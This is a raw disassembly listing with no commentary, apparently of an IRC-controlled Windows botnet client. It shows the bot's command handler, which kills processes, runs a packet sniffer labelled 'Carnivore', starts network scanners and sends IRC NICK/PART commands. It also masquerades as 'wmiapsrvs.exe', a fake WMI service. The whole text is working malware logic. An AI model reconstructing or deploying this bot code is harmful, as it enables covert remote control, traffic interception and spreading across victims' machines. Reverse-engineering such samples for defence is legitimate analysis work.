push offset aServerListenin ; "Server listening on IP: http://%s:%d, D"...
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_814]
push 2
push eax
call sub_40A83B
add esp, 20h
mov [ebp+var_82C], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_BC4]
push eax
push offset sub_4077DC
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_82C]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_402B10
call dword_4190AC ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_814]
push offset aFailedToStartS ; "Failed to start server thread, error: <"...
push eax
call sub_40D6BB
add esp, 0Ch
loc_402AE3: ; CODE XREF: sub_40198E+118A�j
cmp edi, ebx
jnz short loc_402B00
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push esi
loc_402AF8: ; CODE XREF: sub_40198E+17F9�j
call sub_4017B6
loc_402AFD: ; CODE XREF: sub_40198E+747�j
add esp, 10h
loc_402B00: ; CODE XREF: sub_40198E+5B0�j
; sub_40198E+1157�j ...
xor esi, esi
inc esi
jmp loc_40325F
; ---------------------------------------------------------------------------
loc_402B08: ; CODE XREF: sub_40198E+1188�j
push 32h
call dword_419060 ; Sleep
loc_402B10: ; CODE XREF: sub_40198E+1138�j
cmp [ebp+var_818], ebx
jz short loc_402B08
jmp short loc_402AE3
; ---------------------------------------------------------------------------
loc_402B1A: ; CODE XREF: sub_40198E+FE5�j
push [ebp+var_8]
push offset aHttpstop ; "httpstop"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402B54
push [ebp+edi+var_B4]
push 2
push offset aServer ; "Server"
push offset dword_419A78
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_B0]
push [ebp+arg_4]
jmp loc_402ED1
; ---------------------------------------------------------------------------
loc_402B54: ; CODE XREF: sub_40198E+119D�j
push [ebp+var_8]
push offset aFirefox ; "firefox"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402B89
cmp dword_4C47E0, ebx
jz loc_401C32
push [ebp+var_4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4069DE
loc_402B81: ; CODE XREF: sub_40198E+47C�j
; sub_40198E+F20�j
add esp, 0Ch
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_402B89: ; CODE XREF: sub_40198E+11D7�j
push [ebp+var_8]
push offset aInfo ; "info"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402C2B
or [ebp+var_C], 0FFFFFFFFh
call dword_4190A8 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_18], eax
mov eax, [ebp+edi+var_B4]
cmp eax, ebx
jz short loc_402BCB
push eax
call sub_40E0C8
pop ecx
mov [ebp+var_C], eax
loc_402BCB: ; CODE XREF: sub_40198E+1231�j
mov eax, [ebp+var_18]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, [ebp+var_C]
jnb short loc_402BE6
cmp [ebp+var_C], 0FFFFFFFFh
jnz loc_4026CB
loc_402BE6: ; CODE XREF: sub_40198E+124C�j
push ebx
call sub_40A5BD
push eax
push offset aWmiPerformance ; "WMI Performance Adapter Services"
push offset aWmiapsrvs_exe ; "wmiapsrvs.exe"
push offset aBawha ; "bawha"
lea eax, [ebp+var_814]
push offset dword_419A10
push eax
call sub_40D6BB
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push esi
call sub_4017B6
add esp, 2Ch
jmp loc_4026CB
; ---------------------------------------------------------------------------
loc_402C2B: ; CODE XREF: sub_40198E+120C�j
push [ebp+var_8]
push offset aT ; "t"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402D2F
push [ebp+var_B0]
lea eax, [ebp+var_184]
push 80h
push eax
call sub_40DFEC
mov eax, [ebp+arg_4]
mov edi, [ebp+edi+var_B4]
mov [ebp+var_188], eax
mov eax, [ebp+var_4]
mov [ebp+var_FC], eax
mov eax, [ebp+var_10]
add esp, 0Ch
cmp edi, ebx
mov [ebp+var_F8], eax
jz short loc_402C9C
push offset aSub ; "sub"
push edi
call sub_40D720
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_100], eax
jmp short loc_402CA2
; ---------------------------------------------------------------------------
loc_402C9C: ; CODE XREF: sub_40198E+12F2�j
mov [ebp+var_100], ebx
loc_402CA2: ; CODE XREF: sub_40198E+130C�j
lea eax, [ebp+var_814]
push offset aListThreads_ ; "List threads."
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_814]
push 0Dh
push eax
call sub_40A83B
add esp, 14h
mov [ebp+var_104], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_188]
push eax
push offset sub_40AB1A
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_104]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_402D25
call dword_4190AC ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_814]
push offset aFailedToStartL ; "Failed to start list thread, error: <%d"...
push eax
call sub_40D6BB
add esp, 0Ch
loc_402D15: ; CODE XREF: sub_40198E+139F�j
; sub_40198E+1847�j ...
mov esi, [ebp+arg_24]
jmp loc_40325F
; ---------------------------------------------------------------------------
loc_402D1D: ; CODE XREF: sub_40198E+139D�j
push 32h
call dword_419060 ; Sleep
loc_402D25: ; CODE XREF: sub_40198E+136A�j
cmp [ebp+var_F4], ebx
jz short loc_402D1D
jmp short loc_402D15
; ---------------------------------------------------------------------------
loc_402D2F: ; CODE XREF: sub_40198E+12AE�j
push [ebp+var_8]
push offset aPst ; "pst"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402DA1
push [ebp+var_B0]
lea eax, [ebp+var_170]
push eax
mov [ebp+var_174], esi
call sub_40D8A0
cmp [ebp+var_10], ebx
pop ecx
pop ecx
jnz short loc_402D79
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push offset dword_41E1A8
push esi
call sub_4017B6
add esp, 10h
loc_402D79: ; CODE XREF: sub_40198E+13D1�j
lea eax, [ebp+var_814]
push eax
call sub_401648
pop ecx
push ebx
push ebx
lea eax, [ebp+var_174]
push eax
push offset loc_409772
push ebx
push ebx
call dword_4190B0 ; CreateThread
jmp loc_4026CB
; ---------------------------------------------------------------------------
loc_402DA1: ; CODE XREF: sub_40198E+13B2�j
push [ebp+var_8]
push offset aLog ; "log"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402DEA
mov [ebp+var_C], offset dword_4B98E0
loc_402DBB: ; CODE XREF: sub_40198E+1455�j
mov eax, [ebp+var_C]
cmp [eax], bl
jz short loc_402DD5
push [ebp+var_4]
push eax
push [ebp+var_B0]
push esi
call sub_4017B6
add esp, 10h
loc_402DD5: ; CODE XREF: sub_40198E+1432�j
add [ebp+var_C], 80h
cmp [ebp+var_C], offset dword_4BD8E0
jl short loc_402DBB
jmp loc_4026CB
; ---------------------------------------------------------------------------
loc_402DEA: ; CODE XREF: sub_40198E+1424�j
push [ebp+var_8]
push offset aSystem ; "system"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402E28
push [ebp+var_4]
lea eax, [ebp+var_814]
push esi
push [ebp+arg_1C]
push eax
call sub_40A610
add esp, 0Ch
push eax
push [ebp+var_B0]
push esi
call sub_4017B6
add esp, 10h
jmp loc_4026CB
; ---------------------------------------------------------------------------
loc_402E28: ; CODE XREF: sub_40198E+146D�j
push [ebp+var_8]
push offset aDriver ; "driver"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402E58
push [ebp+edi+var_B4]
push [ebp+var_4]
push [ebp+var_B0]
push [ebp+arg_4]
call sub_405E21
jmp loc_404159
; ---------------------------------------------------------------------------
loc_402E58: ; CODE XREF: sub_40198E+14AB�j
push [ebp+var_8]
push offset asc_4193EC ; ""
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_4026CB
cmp [ebp+var_10], ebx
jnz short loc_402E8D
push [ebp+var_4]
push offset aGoinToHellD ; "Goin TO Hell :D"
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 10h
loc_402E8D: ; CODE XREF: sub_40198E+14E4�j
call sub_408B66
call dword_419244 ; WSACleanup
loc_402E98: ; CODE XREF: sub_40198E+E17�j
push ebx
call sub_40DE64
loc_402E9E: ; CODE XREF: sub_40198E+D86�j
push [ebp+var_8]
push offset aStop ; "stop"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402EDE
push [ebp+edi+var_B4]
push 3
push offset aScan ; "Scan"
push offset aScanner ; "Scanner"
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_B0]
push esi
loc_402ED1: ; CODE XREF: sub_40198E+11C1�j
call sub_40AA51
loc_402ED6: ; CODE XREF: sub_40198E+510�j
add esp, 20h
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_402EDE: ; CODE XREF: sub_40198E+1521�j
push [ebp+var_8]
push offset aProcs ; "procs"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_40300E
push 0Ch
call sub_40AA32
test eax, eax
pop ecx
jle short loc_402F23
cmp [ebp+var_10], ebx
jnz loc_401C32
push [ebp+var_4]
push offset aAlreadyRunning ; "Already running."
push [ebp+var_B0]
push esi
call sub_4017B6
jmp loc_404159
; ---------------------------------------------------------------------------
loc_402F23: ; CODE XREF: sub_40198E+1571�j
push [ebp+var_B0]
lea eax, [ebp+var_184]
push 80h
push eax
call sub_40DFEC
mov eax, [ebp+var_4]
mov [ebp+var_FC], eax
mov eax, [ebp+var_10]
mov [ebp+var_F8], eax
mov eax, [ebp+edi+var_B4]
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_188], esi
mov [ebp+var_100], ebx
jz short loc_402F81
push eax
push offset aFull ; "full"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402F81
mov [ebp+var_100], 1
loc_402F81: ; CODE XREF: sub_40198E+15D6�j
; sub_40198E+15E7�j
lea eax, [ebp+var_814]
push offset aProccessList_ ; "Proccess list."
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_814]
push 0Ch
push eax
call sub_40A83B
add esp, 14h
mov [ebp+var_104], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_188]
push eax
push offset sub_409650
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_104]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_403001
call dword_4190AC ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_814]
push offset aFailedToStar_0 ; "Failed to start listing thread, error: "...
push eax
call sub_40D6BB
add esp, 0Ch
jmp loc_4046CF
; ---------------------------------------------------------------------------
loc_402FF9: ; CODE XREF: sub_40198E+1679�j
push 32h
call dword_419060 ; Sleep
loc_403001: ; CODE XREF: sub_40198E+1649�j
cmp [ebp+var_F4], ebx
jz short loc_402FF9
jmp loc_4046CF
; ---------------------------------------------------------------------------
loc_40300E: ; CODE XREF: sub_40198E+1561�j
mov esi, [ebp+var_1C]
mov edi, [ebp+esi+var_B4]
cmp edi, ebx
mov [ebp+var_C], edi
jz loc_401C32
push [ebp+var_8]
push offset aSn ; "sn"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_40318C
push edi
push offset aOn ; "on"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_403131
push 7
call sub_40AA32
test eax, eax
pop ecx
jle short loc_403065
push offset aAlreadyRunning ; "Already running."
jmp loc_40315D
; ---------------------------------------------------------------------------
loc_403065: ; CODE XREF: sub_40198E+16CB�j
mov eax, [ebp+arg_4]
mov [ebp+var_184], eax
mov eax, [ebp+var_4]
mov [ebp+var_FC], eax
mov eax, [ebp+var_10]
mov [ebp+var_F8], eax
mov eax, [ebp+esi+var_B0]
cmp eax, ebx
jnz short loc_4030A9
push offset word_41994E
mov esi, offset dword_41E19C
push esi
call sub_40D720
pop ecx
test eax, eax
mov eax, [ebp+var_B0]
pop ecx
jz short loc_4030A9
mov eax, esi
loc_4030A9: ; CODE XREF: sub_40198E+16FB�j
; sub_40198E+1717�j
push eax
lea eax, [ebp+var_180]
push 80h
push eax
call sub_40DFEC
push ebx
lea eax, [ebp+var_814]
push 7
push eax
call sub_40A83B
add esp, 18h
mov [ebp+var_100], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_184]
push eax
push offset sub_40A29B
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_100]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_403127
call dword_4190AC ; RtlGetLastWin32Error
push eax
push offset aFailedToStar_1 ; "Failed to start Shit thread, error: <%d"...
loc_40310E: ; CODE XREF: sub_40198E+17C8�j
lea eax, [ebp+var_814]
push eax
call sub_40D6BB
add esp, 0Ch
jmp short loc_40316B
; ---------------------------------------------------------------------------
loc_40311F: ; CODE XREF: sub_40198E+179F�j
push 32h
call dword_419060 ; Sleep
loc_403127: ; CODE XREF: sub_40198E+1772�j
cmp [ebp+var_F4], ebx
jz short loc_40311F
jmp short loc_40316B
; ---------------------------------------------------------------------------
loc_403131: ; CODE XREF: sub_40198E+16BB�j
push edi
push offset aOff ; "off"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_40316B
push ebx
push 7
call sub_40A9E5
cmp eax, ebx
pop ecx
pop ecx
jle short loc_403158
push eax
push offset aCarnivoreStopp ; "Carnivore stopped. (%d thread(s) stoppe"...
jmp short loc_40310E
; ---------------------------------------------------------------------------
loc_403158: ; CODE XREF: sub_40198E+17C0�j
push offset aNoShitThreadFo ; "No Shit thread found."
loc_40315D: ; CODE XREF: sub_40198E+16D2�j
lea eax, [ebp+var_814]
push eax
call sub_40D6BB
pop ecx
pop ecx
loc_40316B: ; CODE XREF: sub_40198E+178F�j
; sub_40198E+17A1�j ...
cmp [ebp+var_10], ebx
jnz loc_402B00
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
jmp loc_402AF8
; ---------------------------------------------------------------------------
loc_40318C: ; CODE XREF: sub_40198E+16A6�j
push [ebp+var_8]
push offset aKillproc ; "killproc"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_4031FB
push ebx
push ebx
push edi
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_409427
add esp, 18h
cmp eax, 1
push edi
lea eax, [ebp+var_814]
jnz short loc_4031C4
push offset aProcessKilledS ; "Process killed: %s"
jmp short loc_4031C9
; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_40198E+182D�j
push offset aFailedToKiProc ; "Failed to ki|| process: %s"
loc_4031C9: ; CODE XREF: sub_40198E+1834�j
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_10], ebx
jnz loc_402D15
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 10h
jmp loc_402D15
; ---------------------------------------------------------------------------
loc_4031FB: ; CODE XREF: sub_40198E+180F�j
push [ebp+var_8]
push offset aKillid ; "killid"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_403273
push edi
call sub_40E0C8
push eax
call sub_409718
xor esi, esi
pop ecx
inc esi
pop ecx
cmp eax, esi
push edi
lea eax, [ebp+var_814]
jnz short loc_403231
push offset aProcessKilledI ; "Process killed ID: %s"
jmp short loc_403236
; ---------------------------------------------------------------------------
loc_403231: ; CODE XREF: sub_40198E+189A�j
push offset aFailedToKiPr_0 ; "Failed to ki|| process ID: %s"
loc_403236: ; CODE XREF: sub_40198E+18A1�j
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_10], ebx
jnz short loc_40325F
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 10h
loc_40325F: ; CODE XREF: sub_40198E+1175�j
; sub_40198E+138A�j ...
lea eax, [ebp+var_814]
push eax
call sub_401648
pop ecx
mov eax, esi
jmp loc_401C35
; ---------------------------------------------------------------------------
loc_403273: ; CODE XREF: sub_40198E+187E�j
push [ebp+var_8]
push offset aFind ; "FIND"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_4036CF
push [ebp+arg_4]
call sub_408CE6
push eax
call sub_408D3F
test al, al
pop ecx
pop ecx
jz short loc_4032C0
push [ebp+var_B0]
mov edi, offset dword_41E194
push edi
call dword_4190A4 ; lstrcmpi
test eax, eax
jz short loc_4032C0
cmp [ebp+var_3A0], bl
jnz loc_404148
loc_4032C0: ; CODE XREF: sub_40198E+190E�j
; sub_40198E+1924�j
mov al, byte_41E312
cmp al, bl
mov edx, offset byte_41E312
jz loc_401C32
mov ecx, edx
loc_4032D4: ; CODE XREF: sub_40198E+194B�j
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4032D4
cmp al, bl
jz loc_401C32
mov [ebp+var_1C], edx
loc_4032E6: ; CODE XREF: sub_40198E+1D1A�j
push 3
pop edi
push edi
call sub_40AA32
push [ebp+var_C]
mov esi, eax
call sub_40E0C8
add eax, esi
cmp eax, 0A0h
pop ecx
pop ecx
jle short loc_403335
lea eax, [ebp+var_814]
push offset aTooManySpecifi ; "Too many specified."
push eax
call sub_40D6BB
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 18h
jmp loc_40369F
; ---------------------------------------------------------------------------
loc_403335: ; CODE XREF: sub_40198E+1974�j
push [ebp+var_C]
call sub_40E0C8
or [ebp+var_10C], 0FFFFFFFFh
xor esi, esi
cmp dword_41EE78, ebx
pop ecx
mov [ebp+var_110], eax
mov [ebp+var_124], edi
mov [ebp+var_120], ebx
jz short loc_40339D
mov edi, offset dword_41EE78
loc_403366: ; CODE XREF: sub_40198E+19F4�j
mov eax, [ebp+var_1C]
add eax, 0FFFFFFF6h
push eax
lea eax, [edi-28h]
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_403386
add edi, 3Ch
inc esi
cmp [edi], ebx
jnz short loc_403366
jmp short loc_40339D
; ---------------------------------------------------------------------------
loc_403386: ; CODE XREF: sub_40198E+19EC�j
mov eax, esi
imul eax, 3Ch
mov eax, dword_41EE78[eax]
mov [ebp+var_128], eax
mov [ebp+var_10C], esi
loc_40339D: ; CODE XREF: sub_40198E+19D1�j
; sub_40198E+19F6�j
cmp [ebp+var_128], ebx
jz loc_4036C5
cmp [ebp+var_3B3], bl
jnz short loc_4033D5
cmp [ebp+var_3B2], bl
jnz short loc_4033D5
cmp [ebp+var_3A2], bl
jnz short loc_4033D5
cmp [ebp+var_39B], bl
jnz short loc_4033D5
cmp [ebp+var_39D], bl
jz loc_4043E5
loc_4033D5: ; CODE XREF: sub_40198E+1A21�j
; sub_40198E+1A29�j ...
push 10h
pop esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_4]
mov [ebp+var_8], esi
call dword_4C45F8
mov al, [ebp+var_3B3]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_C4], eax
push [ebp+var_C4]
call dword_4C4710
push eax
lea eax, [ebp+var_23C]
push eax
call sub_40DB80
add esp, 0Ch
cmp [ebp+var_3A2], bl
jz short loc_403483
xor eax, eax
cmp [ebp+var_3B3], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_40DCE0
cmp edi, ebx
pop ecx
pop ecx
mov byte ptr [ebp+arg_0+3], bl
jle loc_403559
loc_403458: ; CODE XREF: sub_40198E+1AEE�j
cmp eax, ebx
jz loc_403559
mov byte ptr [eax], 78h
lea eax, [ebp+var_23C]
push 30h
push eax
call sub_40DCE0
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, edi
jl short loc_403458
jmp loc_403559
; ---------------------------------------------------------------------------
loc_403483: ; CODE XREF: sub_40198E+1A9E�j
cmp [ebp+var_39B], bl
jnz short loc_40349E
cmp [ebp+var_39D], bl
jnz short loc_40349E
mov [ebp+var_FC], ebx
jmp loc_403563
; ---------------------------------------------------------------------------
loc_40349E: ; CODE XREF: sub_40198E+1AFB�j
; sub_40198E+1B03�j
or eax, 0FFFFFFFFh
mov [ebp+var_14], eax
mov [ebp+var_18], eax
mov [ebp+var_28], eax
mov [ebp+var_20], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_23C]
push offset dword_419868
push eax
call sub_40DCA4
add esp, 18h
call sub_40E04D
mov [ebp+arg_0], eax
fild [ebp+arg_0]
fmul dbl_419860
fmul dbl_419858
call sub_40E2E4
mov [ebp+var_18], eax
shl eax, 8
add eax, [ebp+var_14]
mov [ebp+var_28], ebx
push eax
mov [ebp+var_20], ebx
call dword_4C4710
push eax
lea eax, [ebp+var_23C]
push offset aS_0 ; "%s"
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_39D], bl
mov [ebp+var_FC], ebx
jz short loc_403563
lea eax, [ebp+var_23C]
push 30h
push eax
call sub_40DCE0
pop ecx
pop ecx
mov byte ptr [ebp+arg_0+3], bl
loc_403539: ; CODE XREF: sub_40198E+1BC9�j
cmp eax, ebx
jz short loc_403559
mov byte ptr [eax], 78h
lea eax, [ebp+var_23C]
push 30h
push eax
call sub_40DCE0
inc byte ptr [ebp+arg_0+3]
cmp byte ptr [ebp+arg_0+3], 2
pop ecx
pop ecx
jl short loc_403539
loc_403559: ; CODE XREF: sub_40198E+1AC4�j
; sub_40198E+1ACC�j ...
mov [ebp+var_FC], 1
loc_403563: ; CODE XREF: sub_40198E+1B0B�j
; sub_40198E+1B96�j
mov eax, [ebp+var_4]
push [ebp+var_B0]
mov edi, [ebp+arg_4]
mov esi, [ebp+var_10]
mov [ebp+var_104], eax
lea eax, [ebp+var_22C]
push 80h
push eax
mov [ebp+var_12C], edi
mov [ebp+var_100], esi
call sub_40DFEC
push offset word_41994E
push offset dword_41E18C
call sub_40D720
add esp, 14h
test eax, eax
jz short loc_4035C6
push offset dword_41E18C
lea eax, [ebp+var_1AC]
push 80h
push eax
call sub_40DFEC
add esp, 0Ch
jmp short loc_4035CC
; ---------------------------------------------------------------------------
loc_4035C6: ; CODE XREF: sub_40198E+1C1B�j
mov [ebp+var_1AC], bl
loc_4035CC: ; CODE XREF: sub_40198E+1C36�j
cmp [ebp+var_FC], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_4035DE
mov eax, offset aSequential ; "Sequential"
loc_4035DE: ; CODE XREF: sub_40198E+1C49�j
push [ebp+var_110]
lea ecx, [ebp+var_23C]
push [ebp+var_120]
push [ebp+var_124]
push [ebp+var_128]
push ecx
push eax
lea eax, [ebp+var_814]
push offset aSScannerOnSDDe ; "%s Scanner on %s:%d delay %d %d mins %d"...
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_814]
push 3
push eax
call sub_40A83B
add esp, 2Ch
mov [ebp+var_11C], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_23C]
push eax
push offset sub_40AFA2
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_11C]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_4036BB
lea eax, [ebp+var_814]
push offset aCanNotStartSca ; "Can not start scanner"
push eax
call sub_40D6BB
pop ecx
pop ecx
loc_403669: ; CODE XREF: sub_40198E+1D35�j
cmp esi, ebx
jnz short loc_403686
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push edi
call sub_4017B6
add esp, 10h
loc_403686: ; CODE XREF: sub_40198E+1CDD�j
lea eax, [ebp+var_814]
push eax
call sub_401648
mov [esp+48h+var_48], 3E8h
call dword_419060 ; Sleep
loc_40369F: ; CODE XREF: sub_40198E+19A2�j
add [ebp+var_1C], 0Bh
mov eax, [ebp+var_1C]
cmp [eax], bl
jnz loc_4032E6
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_4036B3: ; CODE XREF: sub_40198E+1D33�j
push 32h
call dword_419060 ; Sleep
loc_4036BB: ; CODE XREF: sub_40198E+1CC6�j
cmp [ebp+var_F8], ebx
jz short loc_4036B3
jmp short loc_403669
; ---------------------------------------------------------------------------
loc_4036C5: ; CODE XREF: sub_40198E+1A15�j
push offset aP0rtInvalid_ ; "p0rt invalid."
jmp loc_4043EA
; ---------------------------------------------------------------------------
loc_4036CF: ; CODE XREF: sub_40198E+18F6�j
push [ebp+var_8]
push offset aNick_0 ; "nick"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_4036F8
push edi
push offset aNickS ; "NICK %s\r\n"
loc_4036E8: ; CODE XREF: sub_40198E+1DA4�j
; sub_40198E+2184�j
push [ebp+arg_4]
call sub_40170D
add esp, 0Ch
jmp loc_402660
; ---------------------------------------------------------------------------
loc_4036F8: ; CODE XREF: sub_40198E+1D52�j
push [ebp+var_8]
push offset aJ ; "j"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_403718
push [ebp+esi+var_B0]
push edi
jmp loc_403ACB
; ---------------------------------------------------------------------------
loc_403718: ; CODE XREF: sub_40198E+1D7B�j
mov esi, [ebp+var_8]
push esi
push offset aP ; "p"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_403734
push edi
push offset aPartS ; "PART %s\r\n"
jmp short loc_4036E8
; ---------------------------------------------------------------------------
loc_403734: ; CODE XREF: sub_40198E+1D9C�j
push esi
push offset aR ; "r"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_403770
cmp [ebp+var_14], ebx
jz loc_402660
push edi
push [ebp+var_14]
call sub_40D810
cmp eax, ebx
pop ecx
pop ecx
jz loc_402660
push eax
push [ebp+arg_4]
call sub_4016B8
pop ecx
jmp loc_40273E
; ---------------------------------------------------------------------------
loc_403770: ; CODE XREF: sub_40198E+1DB5�j
push esi
push offset aKillth ; "killth"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_40382E
push edi
push offset aAll ; "all"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_4037B4
call sub_40A9B3
cmp eax, ebx
jle short loc_4037AA
push eax
push offset aStoppedDThread ; "Stopped: %d thread(s)."
jmp loc_4046A0
; ---------------------------------------------------------------------------
loc_4037AA: ; CODE XREF: sub_40198E+1E0F�j
push offset aNoActiveThread ; "No active threads found."
jmp loc_4043EA
; ---------------------------------------------------------------------------
loc_4037B4: ; CODE XREF: sub_40198E+1E06�j
mov esi, [ebp+var_20]
jmp short loc_403823
; ---------------------------------------------------------------------------
loc_4037B9: ; CODE XREF: sub_40198E+1E99�j
mov edi, [ebp+esi*4+var_B8]
cmp edi, ebx
jz loc_401C32
push edi
call sub_40E0C8
push eax
call sub_40A920
pop ecx
pop ecx
test eax, eax
push edi
lea eax, [ebp+var_814]
jz short loc_4037E8
push offset aKilledThreadS_ ; "Killed thread: %s."
jmp short loc_4037ED
; ---------------------------------------------------------------------------
loc_4037E8: ; CODE XREF: sub_40198E+1E51�j
push offset aFail3dToKiThre ; "Fail3d to ki|| thread: %s."
loc_4037ED: ; CODE XREF: sub_40198E+1E58�j
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_10], ebx
jnz short loc_403816
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 10h
loc_403816: ; CODE XREF: sub_40198E+1E6B�j
lea eax, [ebp+var_814]
push eax
call sub_401648
pop ecx
loc_403823: ; CODE XREF: sub_40198E+1E29�j
inc esi
cmp esi, 20h
jb short loc_4037B9
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_40382E: ; CODE XREF: sub_40198E+1DF1�j
push esi
push offset aOpen ; "open"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_40388E
push 5
push ebx
push ebx
push edi
push offset aOpen_0 ; "open"
push ebx
call dword_4191D8
test eax, eax
jz short loc_40387B
cmp [ebp+var_10], ebx
jnz loc_402660
push [ebp+var_4]
push offset aFileOpened_ ; "file opened."
loc_403865: ; CODE XREF: sub_40198E+1EFE�j
; sub_40198E+1F89�j ...
push [ebp+var_B0]
loc_40386B: ; CODE XREF: sub_40198E+206D�j
push [ebp+arg_4]
call sub_4017B6
loc_403873: ; CODE XREF: sub_40198E+214A�j
add esp, 10h
jmp loc_402660
; ---------------------------------------------------------------------------
loc_40387B: ; CODE XREF: sub_40198E+1EC4�j
cmp [ebp+var_10], ebx
jnz loc_402660
push [ebp+var_4]
push offset aCouldnTOpenFil ; "couldn't open file."
jmp short loc_403865
; ---------------------------------------------------------------------------
loc_40388E: ; CODE XREF: sub_40198E+1EAF�j
push esi
push offset aDns ; "dns"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_40391C
push edi
call dword_419248 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_4038C4
push 2
push 4
lea eax, [ebp+arg_0]
push eax
call dword_41924C ; gethostbyaddr
cmp eax, ebx
jz short loc_40390F
push dword ptr [eax]
jmp short loc_4038DD
; ---------------------------------------------------------------------------
loc_4038C4: ; CODE XREF: sub_40198E+1F1E�j
push edi
call dword_419250 ; gethostbyname
cmp eax, ebx
jz short loc_40390F
mov eax, [eax+0Ch]
